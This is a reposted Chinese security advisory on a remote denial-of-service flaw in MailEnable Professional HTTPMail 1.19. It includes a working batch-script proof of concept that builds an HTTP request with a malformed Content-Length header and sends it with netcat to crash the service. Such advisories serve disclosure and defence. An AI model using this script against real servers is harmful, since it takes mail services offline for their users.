MailEnable Professional HTTPMail远程拒绝服务…

2008-04-09 04:27:20来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

MailEnable Professional HTTPMail远程拒绝服务漏洞

发布日期:2004-08-02
更新日期:2004-08-03

受影响系统:
MailEnable MailEnable Professional 1.19
描述:
BUGTRAQ ID: 10838

MailEnable Professional HTTPMail是一款基于WEB的邮件处理程序。

MailEnable Professional HTTPMail不正确处理部分HTTP请求数据,远程攻击者可以利用这个漏洞对AP服务进行拒绝服务攻击。

由于对攻击者提交的GET请求缺少正确处理,提交包含恶意"Content-Length: "字段的HTTP数据,可导致服务崩溃,停止正常服务的响应。

<*来源:CoolICE (CoolICE@China.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109146442215835&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

CoolICE (CoolICE@China.com)提供了如下测试方法:

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application: MailEnable Professional HTTPMail
:Vendors: http://www.mailenable.com/
:Version: 1.19
:Platforms: Windows
:Bug: D.O.S
:Date: 2004-07-30
:Author: CoolICE
:E_mail: CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=8080
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q


:run
nc %1 %PORT% < http.tmp
del http.tmp

建议:
厂商补丁:

MailEnable
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mailenable.com/

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:DansGuardian Hex编码文件扩展名URI内容过滤绕过漏洞

下一篇:多个Oralce产品本地权限提升漏洞